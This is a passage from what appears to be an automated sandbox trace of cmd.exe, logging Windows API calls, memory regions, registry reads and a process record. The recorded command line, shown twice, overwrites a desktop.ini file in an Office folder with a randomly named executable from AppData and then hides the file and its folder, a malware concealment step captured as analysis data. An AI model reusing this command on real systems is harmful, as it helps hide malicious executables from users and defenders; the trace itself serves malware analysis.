(_FileHandle=1) returned 0x4c [0162.794] GetFileType (hFile=0x4c) returned 0x1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.794] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.794] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType 
(hFile=0x4c) returned 0x1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.795] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.795] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.796] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.796] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.796] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.796] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.796] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, 
lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.797] GetFileType (hFile=0x4c) returned 0x1 [0162.797] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.798] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x32, lpOverlapped=0x0) returned 1 [0162.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.798] GetFileType (hFile=0x4c) returned 0x1 [0162.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.798] GetFileType (hFile=0x4c) returned 0x1 [0162.798] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.798] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x32, lpOverlapped=0x0) returned 1 [0162.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.798] _close (_FileHandle=4) returned 0 [0162.798] FindNextFileW (in: hFindFile=0x2c0eb0, lpFindFileData=0x14f5c4 | out: lpFindFileData=0x14f5c4) returned 0 [0162.799] GetLastError () returned 0x12 [0162.799] FindClose (in: hFindFile=0x2c0eb0 | out: hFindFile=0x2c0eb0) returned 1 [0162.799] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0162.800] _close (_FileHandle=3) returned 0 [0162.800] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.800] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.800] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.800] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.800] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.800] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.801] SetConsoleInputExeNameW () returned 0x1 [0162.801] GetConsoleOutputCP () returned 0x1b5 [0162.801] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.801] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.801] exit (_Code=0) Process: id = "280" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xef8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"" cur_dir = 
"C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22360 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22361 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22362 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22363 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 22364 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22365 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22366 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22367 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22368 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name 
= "private_0x000000007ffd3000" filename = "" Region: id = 22369 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22445 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22446 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22447 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22448 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 22449 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 22450 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22451 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22452 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22453 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22454 start_va = 0x76a90000 end_va = 0x76b3bfff 
entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22455 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22456 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22457 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22458 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22459 start_va = 0x470000 end_va = 0x537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 22460 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22461 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22462 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22463 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 22464 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = 
private name = "private_0x00000000000e0000" filename = "" Region: id = 22465 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 22466 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 22467 start_va = 0x650000 end_va = 0x124ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 22468 start_va = 0x1250000 end_va = 0x13b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 22510 start_va = 0x13c0000 end_va = 0x168efff entry_point = 0x13c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 344 os_tid = 0xfb0 [0162.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fac4 | out: lpSystemTimeAsFileTime=0x22fac4*(dwLowDateTime=0x9a37f460, dwHighDateTime=0x1d440a9)) [0162.472] GetCurrentProcessId () returned 0xef8 [0162.472] GetCurrentThreadId () returned 0xfb0 [0162.472] GetTickCount () returned 0x313ed [0162.472] QueryPerformanceCounter (in: lpPerformanceCount=0x22fabc | out: lpPerformanceCount=0x22fabc*=21926166513) returned 1 [0162.473] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.473] __set_app_type (_Type=0x1) [0162.473] __p__fmode () returned 0x76b331f4 [0162.473] __p__commode () returned 0x76b331fc [0162.474] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.474] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.474] GetCurrentThreadId () returned 0xfb0 [0162.474] OpenThread (dwDesiredAccess=0x1fffff, 
bInheritHandle=0, dwThreadId=0xfb0) returned 0x38 [0162.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.474] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.474] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.474] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.474] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa54 | out: phkResult=0x22fa54*=0x0) returned 0x2 [0162.474] VirtualQuery (in: lpAddress=0x22fa8b, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.474] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.474] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.474] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.475] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa24, dwLength=0x1c | out: lpBuffer=0x22fa24*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0162.475] GetConsoleOutputCP () returned 0x1b5 [0162.475] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | 
out: lpCPInfo=0x4a9e4260) returned 1 [0162.475] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.475] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.475] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.475] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.476] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.476] GetEnvironmentStringsW () returned 0x380560* [0162.476] FreeEnvironmentStringsW (penv=0x380560) returned 1 [0162.476] GetEnvironmentStringsW () returned 0x380560* [0162.476] FreeEnvironmentStringsW (penv=0x380560) returned 1 [0162.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e9c4 | out: phkResult=0x22e9c4*=0x40) returned 0x0 [0162.476] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x10, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.476] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x1, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.476] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x1, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.476] 
RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x0, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x40, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x40, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x40, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.477] RegCloseKey (hKey=0x40) returned 0x0 [0162.477] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e9c4 | out: phkResult=0x22e9c4*=0x40) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x40, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x1, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x1, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", 
lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x0, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x9, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x4, lpData=0x22e9d0*=0x9, lpcbData=0x22e9c8*=0x4) returned 0x0 [0162.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e9cc, lpData=0x22e9d0, lpcbData=0x22e9c8*=0x1000 | out: lpType=0x22e9cc*=0x0, lpData=0x22e9d0*=0x9, lpcbData=0x22e9c8*=0x1000) returned 0x2 [0162.477] RegCloseKey (hKey=0x40) returned 0x0 [0162.477] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.477] srand (_Seed=0x5b886384) [0162.477] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"" [0162.477] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 